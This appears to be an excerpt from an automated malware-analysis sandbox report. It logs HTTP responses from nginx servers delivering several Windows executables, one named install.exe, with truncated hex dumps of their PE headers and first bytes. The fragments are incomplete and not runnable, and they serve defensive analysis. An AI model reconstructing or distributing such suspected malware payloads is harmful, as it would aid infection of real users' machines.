00 04 00 00 00 32 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 68 00 00 22 00 00 00 36 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 06 Sep 2024 06:17:05 GMTContent-Type: application/octet-streamContent-Length: 10902016Last-Modified: Thu, 22 Aug 2024 08:54:11 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66c6fcb3-a65a00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 0a 00 30 fc c6 66 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 0e 00 00 82 00 00 00 06 cd 00 00 00 00 00 6f 09 82 01 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 99 01 00 04 00 00 00 00 00 00 02 00 20 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f8 ef 81 01 3c 00 00 00 00 80 96 01 d0 04 03 00 40 53 96 01 60 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 0e 81 01 28 00 00 00 00 52 96 01 38 01 00 00 00 00 00 00 00 00 00 00 00 20 f3 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f6 80 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 20 1f 00 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 e8 c9 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 80 01 00 00 00 b0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 10 00 00 00 00 c0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 10 00 00 00 00 d0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 30 00 00 c6 3a 28 00 00 e0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 31 00 00 58 00 00 00 00 20 f3 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 32 00 00 a0 4d a3 00 00 30 f3 00 00 4e a3 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 2e 72 73 72 63 00 00 00 d0 04 03 00 00 80 96 01 00 06 03 00 00 54 a3 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.1Date: Fri, 06 Sep 2024 06:17:05 GMTContent-Type: application/octet-streamContent-Length: 3443448Connection: keep-aliveContent-Description: File TransferContent-Disposition: attachment; filename=install.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 94 00 00 00 46 00 00 00 00 00 00 40 9c 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 d8 78 35 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 50 09 00 00 00 10 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 a0 6b 34 00 58 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 64 93 00 00 00 10 00 00 00 94 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 4c 02 00 00 00 b0 00 00 00 04 00 00 00 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 88 0e 00 00 00 c0 00 00 00 00 00 00 00 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 50 09 00 00 00 d0 00 00 00 0a 00 00 00 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 e0 00 00 00 00 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 f0 00 00 00 02 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 b4 08 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 2c 00 00 00 10 01 00 00 2c 00 00 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 00 00 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 06 Sep 2024 06:17:05 GMTContent-Type: application/octet-streamContent-Length: 513536Last-Modified: Wed, 04 Sep 2024 17:23:57 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d897ad-7d600"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9e 56 d8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 ca 07 00 00 0a 00 00 00 00 00 00 de e8 07 00 00 20 00 00 00 00 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 08 00 00 02 00 00 cb db 07 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 e8 07 00 4b 00 00 00 00 00 08 00 02 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 0c 00 00 00 58 e7 07 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 c8 07 00 00 20 00 00 00 ca 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 02 06 00 00 00 00 08 00 00 08 00 00 00 cc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 08 00 00 02 00 00 00 d4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 e8 07 00 00 00 00 00 48 00 00 00 02 00 05 00 c8 da 07 00 90 0c 00 00 03 00 02 00 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 9c 51 cd 59 06 b1 01 70 c5 1a 71 56 cb 7b bf 0f 30 5f 86 f0 c8 a7 c4 39 32 aa 4e 72 f9 ad 25 ad 8d 4e d9 39 a3 68 8c a8 68 91 58 87 64 2f f0 8d 81 c3 4b 35 77 f7 fa 2e 95 13 dc 7d 3c 89 12 cd 81 83 f3 d1 fa 1d b9 23 67 56 a8 94 ba 3d 2a e1 a0 c4 c8 85 5f 5b 8f 80 1d dd f0 86 13 76 70 06 ee 62 73 ba 50 c1 ea fe a4 1a 5b 97 e2 fc 9e 42 bf a1 a6 ec 59 88 8f 17 da d8 3a 45 91 28 b3 c4 2f 31 94 e9 25 0a dc d2 17 6c 3e 8c 4c 8d 0b 89 06 8e da a9 61 44 b4 a1 85 52 91 3c ec 28 ab 3b b0 bf 52 5f bf 29 7e a9 34 fe 57 e3 53 6c e1 d3 b1 49 8c 2a b8 41 dd 14 44 ac 28 d0 08 e8 5b 4a a6 bb 75 af d5 27 db 51 ce e9 b9 e4 e9 79 70 d8 f8 8a 5c f9 db 3d 96 d1 39 47 26 c0 0f 3c 35 8d 75 36 60 91 ef c9 f9 74 2c 03 50 8e a2 e1 3a a5 ec 6b e2 f3 3d 36 78 be 7b 63 e4 a7 c0 b7 f4 71 eb ff 08 a3 b8 a0 d2 ad df 07 89 1e c7 93 58 b2 bd e8 60 32 94 3b 4c d8 4a 48 98 0c 39 63 2f d0 8d af 1b dc fb 86 ef 19 42 25 92 73 82 b
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 06 Sep 2024 06:17:06 GMTContent-Type: application/octet-streamContent-Length: 3851776Last-Modified: Mon, 02 Sep 2024 11:18:17 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d59ef9-3ac600"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 15 38 33 9d 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 e0 29 00 00 e2 10 00 00 00 00 00 9e ff 29 00 00 20 00 00 00 00 2a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 3b 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 50 ff 29 00 4b 00 00 00 00 20 2a 00 08 dd 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 0c 00 00 00 02 ff 29 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 df 29 00 00 20 00 00 00 e0 29 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 e8 01 00 00 00 00 2a 00 00 02 00 00 00 e4 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 08 dd 10 00 00 20 2a 00 00 de 10 00 00 e6 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 3b 00 00 02 00 00 00 c4 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 06 Sep 2024 06:17:09 GMTContent-Type: application/octet-streamContent-Length: 14748160Last-Modified: Fri, 30 Aug 2024 12:15:51 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d1b7f7-e10a00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 34 de 00 00 00 00 00 e0 00 02 01 0b 01 03 00 00 88 60 00 00 e6 0a 00 00 00 00 00 10 7c 07 00 00 10 00 00 00 40 d1 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 c0 e4 00 00 04 00 00 56 55 e1 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 c0 dc 00 4c 04 00 00 00 e0 e1 00 95 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 dc 00 5c fa 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 56 d1 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 86 60 00 00 10 00 00 00 88 60 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 2c 93 70 00 00 a0 60 00 00 94 70 00 00 8c 60 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ac 77 0b 00 00 40 d1 00 00 12 08 00 00 20 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 4c 04 00 00 00 c0 dc 00 00 06 00 00 00 32 d9 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 5c fa 04 00 00 d0 dc 00 00 fc 04 00 00 38 d9 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 73 79 6d 74 61 62 00 04 00 00 00 00 d0 e1 00 00 02 00 00 00 34 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 2e 72 73 72 63 00 00 00 95 d2 02 00 00 e0 e1 00 00 d4 02 00 00 36 de 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 06 Sep 2024 06:17:14 GMTContent-Type: application/octet-streamContent-Length: 331776Last-Modified: Thu, 05 Sep 2024 16:36:50 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d9de22-51000"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c4 dc d9 66 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 0b 00 00 04 05 00 00 0a 00 00 00 00 00 00 de 22 05 00 00 20 00 00 00 40 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 90 22 05 00 4b 00 00 00 00 40 05 00 14 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 05 00 0c 00 00 00 4c 22 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 02 05 00 00 20 00 00 00 04 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 14 06 00 00 00 40 05 00 00 08 00 00 00 06 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 05 00 00 02 00 00 00 0e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 22 05 00 00 00 00 00 48 00 00 00 02 00 05 00 28 26 00 00 88 17 00 00 03 00 02 00 0b 00 00 06 b0 3d 00 00 e8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 05 00 5d 00 00 00 01 00 00 11 2b 05 28 fb 03 4f 4f 7e 01 00 00 04 3a 4b 00 00 00 17 80 01 00 00 04 28 10 00 00 0a 20 e8 07 00 00 20 09 00 00 00 20 05 00 00 00 73 11 00 00 0a 28 12 00 00 0a fe 0e 00 00 fe 0d 00 00 28 13 00 00 0a 28 14 00 00 0a 20 0e 00 00 00 3f 0b 00 00 00 72 01 00 00 70 73 15 00 00 0a 7a 2a 00 00 00 36 2b 05 28 63 88 12 4f 28 01 00 00 06 2a 00 00 4e 2b 05 28 44 b0 3c 35 28 15 00 00 06 02 28 16 00 00 0a 2a fa 2b 05 28 f9 08 51 4e 28 15 00 00 06 1f 10 8d 1c 00 00 01 25 d0 06 00 00 04 28 17 00 00 0a 80 02 00 00 04 20 00 c0 04 00 8d 1c 00 00 01 25 d0 07 00 00 04 28 17 00 00 0a 80 03 00 00 04 2a 00 6a 2b 05 28 52 ff 69 5b 28 15 00 00 06 02 28 16 00 00 0a 02 03 28 06 00 00 06 2a 00 13 30 03 00 34 00 00 00 02 00 00 11 2b 05 28 65 95 62 69 03 0b 16 0c 38 12 00 00 00 07 08 6f 18 00 00 0a 0a 06 28 19 00 00 0a 08 17 58 0c 08 07 6f 1a 00 00 0a 3f e2 ff ff ff 28 1b 00 00 0a 2a 13 30 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 06 Sep 2024 06:17:14 GMTContent-Type: application/octet-streamContent-Length: 3607496Last-Modified: Thu, 05 Sep 2024 10:40:39 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d98aa7-370bc8"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 38 06 b7 aa 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 5c 26 00 00 ea 0f 00 00 00 00 00 2e 7a 26 00 00 20 00 00 00 80 26 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 36 00 00 04 00 00 86 d4 37 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 e0 79 26 00 4b 00 00 00 00 a0 26 00 94 e2 0f 00 00 00 00 00 00 00 00 00 00 4a 36 00 c8 c1 00 00 00 a0 36 00 0c 00 00 00 90 79 26 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 5a 26 00 00 20 00 00 00 5c 26 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 18 02 00 00 00 80 26 00 00 04 00 00 00 60 26 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 94 e2 0f 00 00 a0 26 00 00 e4 0f 00 00 64 26 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 36 00 00 02 00 00 00 48 36 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
